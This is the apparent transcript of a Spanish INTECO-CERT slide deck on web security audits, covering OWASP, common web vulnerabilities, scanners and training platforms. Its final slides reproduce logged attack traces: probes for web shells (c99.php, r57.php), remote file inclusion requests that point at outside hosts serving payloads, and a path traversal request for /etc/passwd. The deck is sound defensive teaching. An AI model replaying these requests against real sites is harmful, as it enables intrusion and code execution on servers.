seguridad web: auditorÍas y herramientas · 3. herramientas de auditoría web 1) aplicaciones...
TRANSCRIPT
2
Seguridad Web: Auditorías y Herramientas
0. Presentación INTECO
1. Auditorías Web1) Introducción a la Seguridad Web2) OWASP & WASC3) Vulnerabilidades Web hoy en día4) Procedimientos y técnicas de auditoria Web
2. Experiencias de INTECO-CERT1) Experiencias de colaboración de INTECO-CERT
Índice
3
Seguridad Web: Auditorías y Herramientas
3. Herramientas de auditoría Web1) Aplicaciones comerciales de auditoria para Web.2) Aplicaciones gratuitas de auditoria para Web.3) Plataformas de aprendizaje
4. Otras fuentes de Información1) El otro lado: trazas de un ataque Web2) Concursos y Retos
Índice
4
El Instituto Nacional de Tecnologías de la Comunicación, INTECO
5
Actuaciones en e-Confianza de INTECO
Instituto Nacional de Tecnologías de la Comunicación
Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TICAlta localización de conocimiento intensivo y conexión con otros centros
internacionales.
OBJETIVOS
Sociedad estatal adscrita al MITYC a través de SETSIInstrumento del Plan Avanza para el desarrollo de la S.IPilares: Investigación aplicada, prestación de servicios y formación
1. ¿Qué es INTECO?
6
2. Líneas estratégicas de actuación
Actuaciones en e-Confianza de INTECO
Ciudadanía e Internet
Innovación TIC y Competitividad PYME
Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos
Centro Demostrador de Tecnologías de la Seguridad
Observatorio de Seguridad de la Información
e-Confianza (Seguridad)
Laboratorio Nacional de Calidad
Formación
Promoción de proyectos TIC
Promoción de estándares y normalización
Calidad SW
Centro de Referencia en Accesibilidad y Estándares Web
Centro Nacional de Tecnologías de la Accesibilidad
Área de I+D+i en Accesibilidad Web.
Centro de Gestión de servicios públicos interactivos - TDT
Accesibilidad
7
Actuaciones en e-Confianza de INTECO
3. Proyectos en e-Confianza
Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad Informática
Coordinar la investigación aplicada y la formación especializada en el ámbito de la seguridad TIC
Centro de referencia en Seguridad Informática a nivel nacional
Observatorio de la Seguridad de la información
INTECO CERTCentro Demostrador de
Tecnologías de la Seguridad
8
Objetivos
Impulsar la confianza en las nuevas tecnologías promoviendo su uso de forma segura y responsableMinimizar los perjuicios ocasionados por incidentes de seguridad, accidentes o fallos facilitando mecanismos de prevención y reacción adecuadosPrevenir, informar, concienciar y formar a la pyme y el ciudadano proporcionando información clara y concisa acerca de la tecnología y el estado de la seguridad en Internet.
INTECO-CERT
9
Servicios de Información:• Suscripción a boletines y alertas• Actualidad, noticias y eventos• Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos
por correo electrónico, información sobre correo electrónico no deseado.Servicios de Formación: guías, manuales, cursos onlineServicios de Protección: útiles gratuitos y actualizaciones de softwareServicios de Respuesta y Soporte:• Gestión y resolución de Incidencias• Gestión de Malware o código malicioso• Fraude electrónico• Asesoría Legal• Foros
Servicios de INTECO-CERT en materia de seguridad: http://cert.inteco.es
INTECO-CERT
10
Servicios de Información: Vulnerabilidades y Malware
Colaboración con NIST-NVDTraducción de más de 33.800 vulnerabilidadesClasificación por nivel de severidadAportación de vulnerabilidades descubiertas.
INTECO-CERT
11
Más de 170 sensores más de 100 millones de correos procesados al día.0,40% de detección de correos infectados de virus informáticos en más de 40.000 millones de correos analizados.Información de detecciones de malware en correo en https://ersi.inteco.es/
Servicios de Información: Virus en el correo electrónico. Red de sensores de Virus.
INTECO-CERT
12
CORREOS ELECTRÓNICOS
Servicios de Información: SPAM. Red de sensores de SPAM.
https://ersi.inteco.es/
INTECO-CERT
13
Guías y Manuales.Buenas prácticas.Preguntas frecuentes.
FormaciónServicios de Formación y Protección.
Descarga de útiles gratuitos de seguridadInformación sobre actualizaciones de software, parches etc..Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos Móviles.
Protección
INTECO-CERT
14
Servicios de Formación y Protección.Protección
Avisos y alertas de seguridad, a través de boletines y web.
INTECO-CERT
15
Resolución y ayuda ante incidentes de seguridad.Análisis y recomendaciones de seguridad.Sistemas de detección de malware en la red.
Gestión de incidencias o problemas de seguridadServicios de Respuesta y Soporte.
Desarrollo de herramientas propias: CONAN. Configuration Analisys.
Recoge información del PC susceptible de ser modificada por código malicioso y cualquier otra información que nos sirva para determinar si el PC estáo no correctamente configurado.
INTECO-CERT
16
Buzón de Consultas, Foros de Usuarios y Asesoría Legal de Derecho en las Nuevas Tecnologías
Difusión de Guías de buenas prácticas y Manuales de concienciación y formación sobre legislación y normativas en materia de Seguridad TIC.
Guías de implantación de medidas que faciliten el cumplimiento de las disposiciones legales.
Asesoría Legal
Servicios de Respuesta y Soporte.
INTECO-CERT
17
Información a los usuarios sobre todos los tipos de fraude electrónico a través de foros y buzón [email protected].
Repositorio de fraude de INTECO con información estructurada de los fraudes detectados
creación de inteligencia sobre fraude electrónico en España.
Colaboración con entidades financieras, FCSE, ISPs y registradores de dominios.
Lucha contra el Fraude
Servicios de Respuesta y Soporte.
INTECO-CERT
18
Objetivos
Fomentar y difundir el uso de tecnologías de seguridad de la información
Centro Demostrador de Tecnologías de la Seguridad
Catálogo de Soluciones y ProveedoresAnálisis de productos de seguridadFormación a la PYMEDifusión e impulso de la tecnología de seguridadImpulso del DNI electrónico y SGSI
http://demostrador.inteco.es
19
Catálogo de empresas y soluciones
Catalogación de todos los actores del mercado, datos de proveedor.
Catalogación de los productos que ofrecen, datos de producto.
Catalogación de los servicios que ofrecen, datos de servicio.
Centro Demostrador de Tecnologías de la Seguridad
Catálogo impreso
20
Catálogo online
Centro Demostrador de Tecnologías de la Seguridad
21
Centro Demostrador de Tecnologías de la Seguridad
Taxonomía de productos y servicios
Productos (31 categorías) Servicios (14 categorías)
22
Centro Demostrador de Tecnologías de la Seguridad
DATOS ACTUALES DEL CATÁLOGO OFERTA ACTUAL DE PRODUCTOS
557 1007
Nº DE EMPRESAS
Nº DE SOLUCIONES
OFERTA ACTUAL DE SERVICIOS
Anti - Malware 64
Sistemas de seguridad de datos 45
Filtro y control de contenidos 38
Autenticación 104
Políticas de Seguridad 128
Planificación e implantación de infraestructuras 107
Cumplimiento con la legislación (LOPD,..) 102
Certificación y Acreditación 61
23
Análisis y demostración de productos y soluciones de seguridad
Ámbito y alcance de la aplicación
Conocer sus capacidades y características
Análisis funcional y estructural
Ayuda a los fabricantes
Laboratorio de nuevos productos y tecnologías
Generar recomendaciones
Centro Demostrador de Tecnologías de la Seguridad
24
Difusión e impulso de la tecnología de seguridad
Estudio de mercado sobre las soluciones de seguridad TIC
Identificar nichos en la industria TIC española
Promoción de alianzas
Potenciar la tecnología de seguridad española y promover su desarrollo
Acuerdos con entidades de otros países
Centro Demostrador de Tecnologías de la Seguridad
25
Centro Demostrador de Tecnologías de la Seguridad
Promoción de alianzas
• Empresas: convenios de colaboración
• Asociaciones: relación con todas las patronales del
sector.
• Actores proactivos: banca, universidades,…
50 convenios 8 convenios
2008 2009
26
Centro Demostrador de Tecnologías de la Seguridad
• Eventos propios• I ENISE
II ENISE
27
Formación a la Pyme
Identificación de amenazas
Elaboración de contenidos
Impulso cultura de seguridad
Impulso del uso de tecnologías de seguridad
Centro Demostrador de Tecnologías de la Seguridad
2200
25
90
Jornadas celebradas
Pymes sensibilizadas
Media de asistentes
28
Líneas Generales
Programa de Impulso de los SGSI (Sistema de Gestión de Seguridad de la Información)
INTECO recibe la encomienda de
Gestión
Colabora con
Organizan
Seleccionan
Seleccionan
Colabora
Colabora
JORNADAS Y TALLERES
SGSI
INTECO
CÁMARAS DE COMERCIO
CATÁLOGO EMPRESAS IMPLANTACIÓN SGSI
PYME
CATÁLOGO ORGANISMOS
CERTIFICACIÓN SGSI
29
Los niveles de garantía de seguridad EAL1 y EAL3 indican la profundidad y rigor exigido en la evaluación de las aplicaciones que se quieran certificar.
Unas Guías que facilitarán a los desarrolladores el cumplimiento con los perfiles se podrán descargar del Portal del DNIe de INTECO
Los Perfiles de Protección son documentos que especifican una solución de seguridad: la creación y verificación de firma electrónica con DNIe:
adoptan la legislación y normativa nacional y europeadefinen el nivel de garantía de seguridad que ofrece una aplicación certificada que cumpla con el perfil
Impulso DNIe: Perfiles de Protección
Van a servir para desarrollar ycertificar aplicaciones de firma con DNIe con garantías de seguridad:Tipo 1: para plataformas TDT, PDA’s o teléfonos móvilesTipo 2: para ordenadores personales con S.O. de propósito general
30
Servicios gratuitos de Información a través del portal web, RSS o suscripción• Actualidad, noticias y eventos• Alertas y estadísticas en tiempo real sobre la seguridad en España
Servicios gratuitos de Formación en Seguridad de la Información• Manuales sobre legislación vigente• Configuración de seguridad en sistemas• Guías de resolución de problemas de seguridad • Buenas prácticas para la prevención de problemas de seguridad
Servicios gratuitos de Protección: • Catálogo de útiles gratuitos de seguridad• Catálogo de actualizaciones de software
Servicios gratuitos de Respuesta y Soporte:• Gestión y resolución de Incidencias de Seguridad• Gestión y soporte ante fraude electrónico• Asesoría Legal
Servicios prestados a pymes y ciudadanos:
Resumen de Servicios de eConfianza.
31
INTECO-CERT
• http://cert.inteco.es
• http://demostrador.inteco.es
Centro Demostrador de Tecnologías de la Seguridad
Contactos
32
Dónde estamos
www.inteco.es
Sede de INTECO
Avda. Jose Aguado 41Edificio INTECO24005 LEÓN
Tel: (+34) 987 877 189Fax: (+34) 987 261 016
Sede de INTECO
Avda. Jose Aguado 41Edificio INTECO24005 LEÓN
Tel: (+34) 987 877 189Fax: (+34) 987 261 016
33
¿Preguntas?
34
Seguridad Web
35
Problemática de seguridad en las aplicaciones Web
• Cada vez son aplicativos mas complejos y dinámicos.• Resultan “fáciles” comprometer o atacar.• Muchas veces están accesibles desde Internet y forman parte del
perímetro de seguridad de la empresa.• Se trata de aplicaciones sin visión de la seguridad en su desarrollo.• La seguridad en Internet no depende exclusivamente de la seguridad de la
red o de los sistemas, sino también de las aplicaciones que están accesibles
La seguridad de las aplicaciones Web resulta muy importante y para ello debemos auditarlas y asegurarnos de que no suponen un riesgo para la organización.
Introducción a la seguridad Web
1. Auditorías Web
36
¿Qué es OWASP?• Fundación sin animo de lucro.• Creada en 2001.• Independiente de los fabricantes.• Formada por voluntarios.
Objetivos:• Promover la seguridad de las aplicaciones web.• Buscar las causas de la inseguridad.• Proporcionar soluciones a las amenazas.• Crear herramientas, documentación y estándares.
OWASP: Open Web Application Security Project
1. Auditorías Web
37
¿Qué hace OWASP?• Recursos para equipos de desarrollo.• Foros de discusión.• Aplicaciones para auditoria y para formación.• Documentación y artículos.
Proyectos dentro de OWASP:• Webscarab: Herramienta para auditoria.• WebGoat: Herramienta para formación.• OWASP Testing: Metodología.• Web Application Penetration Checklist: Documentación.• OWASP Guide y Top Ten Project: Documentación.
OWASP: Open Web Application Security Project
1. Auditorías Web
38
WASC: Web Application Security Consortium
¿Qué es WASC?• Participada por la industria, expertos y organizaciones.• Foro abierto de participación.
Objetivos:• Promover estándares de seguridad web.• Elaboración de artículos y guías de seguridad web.• Compartir el conocimiento sobre las amenazas web.
Proyectos:• Application Security Scanner Evaluation Criteria.• Web Hacking Incidents Database.• Distributed Open Proxy Honeypots. • Web Security Threat Classification.
1. Auditorías Web
39
• Vulnerabilidades Web
1. Auditorías Web
El vector de ataque de las Vulnerabilidades Web son las PeticionesEl protocolo HTTP define diversos tipos de peticiones conocidos como métodos, los comunes son los siguientes:• OPTIONS: Permite listar todos los métodos permitidos por el servidor.• GET: Sirve para solicitar un objeto Web, admite parámetros• HEAD: Solicita la cabecera HTTP del servidor Web.• POST: Sirve para solicitar un objeto Web, admite parámetros.• PUT: Permite enviar un fichero al servidor Web.• DELETE: Borra un objeto Web.• TRACE: Tiene como finalidad propósitos de depuración.• CONNECT: Permite conectar a otro servidor host (proxy, webserver, ...).
40
• Vulnerabilidades Web
1. Auditorías Web
Problemática: Autenticación en aplicaciones Web
• Autenticación anónima (sin autenticación)• Autenticación a través de la propia aplicación Web
• Basada en formularios mediante peticiones de tipo GET / POST• Autenticación basada en el protocolo HTTP
• HTTP Tipo Basic• HTTP Tipo Digest
• Autenticación a través de credenciales del sistema operativo• Cuentas de usuario locales o del dominio (AD, ldap, ...)• Seguridad en función del sistema de ficheros (NTFS, ...)
41
• Vulnerabilidades Web
1. Auditorías Web
Ataques a los mecanismos de autenticación en las aplicaciones Web:• Captura de credenciales (sniffing o hijacking)
• Si las credenciales de autenticación no viajan por un canal cifrado (SSL) es posible capturar las credenciales de autenticación utilizadas.
• Identificación de cuentas de usuario validas• Respuestas diferentes cuando el usuario introducido es incorrecto de
cuando es la contraseña introducida es incorrecta • Denegación de servicio a los mecanismos de autenticación
• A realizar n intentos de autenticación fallidos y la aplicación no esta correctamente parametrizada es posible bloquear las cuentas de usuario
• Ataque por Fuerza Bruta o Diccionario• Si se combina la identificación de usuario con una incorrecta política
de bloqueo de cuentas puede realizarse estos ataques
42
• Vulnerabilidades Web
1. Auditorías Web
Problemática: Gestión de las Sesiones en las aplicaciones Web
• El protocolo HTTP es un protocolo sin estado, se necesitan identificadores de sesión.
• La gestión de sesiones es un proceso ligado con el proceso de autenticación de usuario.
• Se asocia al usuario un identificador de Sesión que este enviara a la aplicación Web en cada petición
• El identificador de sesión es generalmente una cadena de caracteres generada “aleatoriamente”
• El identificador de sesión forma parte de la cabecera HTTP, como Cookie. Aunque es posible enviarlo en peticiones de tipo GET o POST
43
• Vulnerabilidades Web
1. Auditorías Web
Ataques a los mecanismos de gestión de identificadores de Sesión• Ataques de interceptación de sesión
• Existen diferentes ataques de intercepción por ejemplo: sniffing, XSS, SQL injection, etc.
• Ataques por predicción del identificador• Si la cadena de caracteres del identificador no es suficientemente
aleatoria puede permitir su predicción• Ataques por Fuerza Bruta
• Si el algoritmo utilizado para la generación del identificador no es suficientemente robusto, puede ser posible obtener una sesión valida por fuerza bruta
• Ataques de Fijación de sesión• Si la aplicación no gestiona la caducidad de las sesiones o asocia
siempre la misma sesión a un mismo usuario puede permitir el robo de sesiones por diversos métodos (virus, hijacking, etc)
44
• Vulnerabilidades Web
1. Auditorías Web
Problemática: Validación de caracteres de entrada y salida• Incorrecto control de los caracteres en variables de entrada.
• SQL injection• Command Injection• Inclusión de código script de servidor.• Idap injection• Include path• Transversal Directory
• Incorrecto control de los tamaños de las variable de entrada• Desbordamientos de Buffer• Denegaciones de Servicio
Ataques de validación de I/O:• El limite es la imaginación
45
• Vulnerabilidades Web hoy en dia:
El Top 10 de vulnerabilidades de OWASP
Cross Site Scripting (XSS).
Inyecciones de código.
Ejecución de ficheros maliciosos.
Manipulación de rutas a objetos.
Cross Site Request Forgery (CSRF).
Manejo inadecuado de errores.
1. Auditorías Web
46
• Vulnerabilidades Web hoy en dia:
El Top 10 de vulnerabilidades de OWASP
Robo de credenciales de sesión o de control de acceso.
Almacenamiento de datos inseguro.
Comunicaciones por un canal inseguro.
Fallo en la ocultación de URLs de gestión.
http://www.owasp.org/index.php/Top_10_2007
http://www.owasp.org/index.php/Top_10_2004
1. Auditorías Web
47
Utilización de la herramienta adecuada a cada aplicativo.
Metodología de auditoria.OWASP Testing.Web Application Penetration Checklist.OSSTMM.
Chequear todos los resultados de las herramientas.
Uso de herramientas para localización de URLs ocultas.
Conocer en lo posible la aplicación.
1. Auditorías Web
48
Documentarse sobre las vulnerabilidades existentes.
Uso de distintos patrones de los ataquesXSS (Cross Site Scripting) Cheat Sheet - http://ha.ckers.org/xss.htmlXSSDB attack database - http://www.gnucitizen.org/xssdb/
Captura de evidencias.
No realizar denegaciones de Servicio.
Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking
1. Auditorías Web
49
Es importante no menospreciar las fugas de información en las respuestas del servidorEs necesario validar todos los caracteres de entrada en las variables de peticiones GET y POST Hay que generar identificadores de sesión complejos, con aleatoriedad, enviarlos a través de las Cookies y con caducidad Utilización de contraseñas fuertes.Validar el identificador de sesión en todas las páginas.No almacenar las contraseñas en claro en la Base de Datos.No utilizar variables ocultas que no deseen ser vistas o modificadas por el usuario.
1. Auditorías Web
50
Resolución y ayuda ante incidentes de seguridad.Análisis y recomendaciones de seguridad.Sistemas de detección de malware en la red.
Gestión de incidencias o problemas de seguridad
Ministerio de Vivienda: A partir de un incidente de seguridad en la pagina web se realizo un análisis exhaustivo de la seguridad de la misma.
Foro Internacional de Contenidos Digitales:Revisión de seguridad de la Web del Foro Internacional de Contenidos Digitales (FICOD 2008) del Ministerio de Industria.
2. Experiencias de INTECO-CERT
51
Vulnerabilidades de SQL injection.• Con obtención de usuarios y contraseñas.
Incorrecto manejo de sesiones.• Posibilidad de saltarse la autenticación y obtener una sesión
privilegiada en la aplicación. Incorrecta configuración del servidor.
• Listado de directorios.• Obtención de información sensible del servidor.• Acceso a ficheros de logs.
Versiones no actualizadas o con vulnerabilidades.• Versiones de PHP, del gestor de contenidos, etc.
Vulnerabilidades más encontradas
2. Experiencias de INTECO-CERT
52
Propósito múltiple (no exclusivas por vulnerabilidad).
Capacidad de auditoria ante cualquier tipo de aplicativo.
Incorporan utilidades para pruebas manuales.
Aspectos Configurables.
Proporcionan abundante documentación.
Suelen ser herramientas lentas.
Tienen muchos falsos positivos.
Un elevado precio.
• Aplicaciones comerciales
Características comunes
3. Herramientas de auditoría Web
53
• Acunetix Web Vulnerability Scanner
3. Herramientas de auditoría Web
54
• IBM Rational AppScan
3. Herramientas de auditoría Web
55
• HP WebInspect
3. Herramientas de auditoría Web
56
La mayoría son para un propósito especifico.
Tienen limitaciones para algún tipo de aplicativo.
Incorporan utilidades para pruebas manuales.
Mayor capacidad de configuración.
Proporcionan menos documentación.
Suelen ser herramientas lentas.
Tienen muchos falsos positivos.
Son gratis ☺.
• Aplicaciones gratuitas
Características comunes
3. Herramientas de auditoría Web
57
• WebScarab
3. Herramientas de auditoría Web
58
• Paros
3. Herramientas de auditoría Web
59
• w3af
3. Herramientas de auditoría Web
60
• Plataformas de aprendizaje: WEBGOAT
3. Herramientas de auditoría Web
61
• Plataformas de aprendizaje: WEBGOAT
3. Herramientas de auditoría Web
Video Soluciones
http://yehg.net/lab/pr0js/training/webgoat.php
62
• Plataformas de aprendizaje: HACKME FOUNDSTONE
http://www.foundstone.com/us/resources-free-tools.asp
3. Herramientas de auditoría Web
63
Búsqueda de un objetivo para un ataque
GET /horde-3.0.6//README HTTP/1.1GET /horde-3.0.7//README HTTP/1.1GET /horde-3.0.8//README HTTP/1.1GET /email//README HTTP/1.1GET /webmail//README HTTP/1.1GET /mailz//README HTTP/1.1GET /horde2//README HTTP/1.1
GET //scgi/awstats/awstats.pl HTTP/1.1GET //scripts/awstats.pl HTTP/1.1GET //cgi-bin/awstats/awstats.pl HTTP/1.1GET //cgi-bin/stats/awstats.pl HTTP/1.1GET //scgi-bin/stats/awstats.pl HTTP/1.1
CONNECT 195.175.37.70:8080 HTTP/1.0OPTIONS * HTTP/1.0
4. Otras fuentes de Información
64
Búsqueda de un objetivo para un ataque
GET /phpMyAdmin/main.php HTTP/1.0GET /phpmyadmin/main.php HTTP/1.0GET /phpmyadmin/tbl_select.php HTTP/1.1GET /phpmyadmin0/tbl_select.php HTTP/1.1GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1GET /phpmyadmin2/read_dump.php HTTP/1.0GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0
GET /phpmyadmin/r57.php HTTP/1.1GET /phpmyadmin/c99.php HTTP/1.1GET /phpmyadmin/shell.php HTTP/1.1GET /phpmyadmin/cmd.php HTTP/1.1
GET /w00tw00t.at.ISC.SANS.MSlog:) HTTP/1.1GET /w00tw00t.at.ISC.SANS.Pwn!t:) HTTP/1.1GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
4. Otras fuentes de Información
65
Trazas de un intento de ataque/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera
nchjohnstown.com/menu/r7?? HTTP/1.1
/en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a ltervista.org/a.txt?? HTTP/1.1
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter vista.org/a.txt?? HTTP/1.1
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft p.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF /1? HTTP/1.1
//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9 0/upload/071011004039p/old? HTTP/1.1
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0 HTTP/1.1
4. Otras fuentes de Información
66
Trazas de un intento de ataque
GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://80.3 4.102.151/joomla/1.gif?/ HTTP/1.1
Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-usConnection: CloseHost: 85.17.35.XUser-Agent: Morfeus Fucking Scannermod_security-action: 406
HTTP/1.1 406 Not AcceptableConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1
4. Otras fuentes de Información
67
Trazas de un intento de ataque
GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/ /ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%F F/1? HTTP/1.1
Connection: TE, closeHost: www.X.comTE: deflate,gzip;q=0.3User-Agent: libwww-perl/5.808mod_security-action: 406
HTTP/1.1 406 Not AcceptableConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1
4. Otras fuentes de Información
68
Trazas de un intento de ataque
GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0Connection: Keep-AliveContent-Length: 0Host: www.X.netUser-Agent: Mozilla/4.75 (Nikto/1.35 )mod_security-action: 406
HTTP/1.1 406 Not AcceptableConnection: closeContent-Type: text/html; charset=iso-8859-1
4. Otras fuentes de Información
69
CONCURSOS Y RETOS
Retos Hacking (I – IX)
http://elladodelmal.blogspot.com/search/label/Reto%20Hacking
Concurso BSGAME #1
http://blindsec.com:81/ http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1
SecGame SG6Labs
http://www.sg6.es/labs/
4. Otras fuentes de Información
70
¿Preguntas?
71
Muchas gracias
www.inteco.es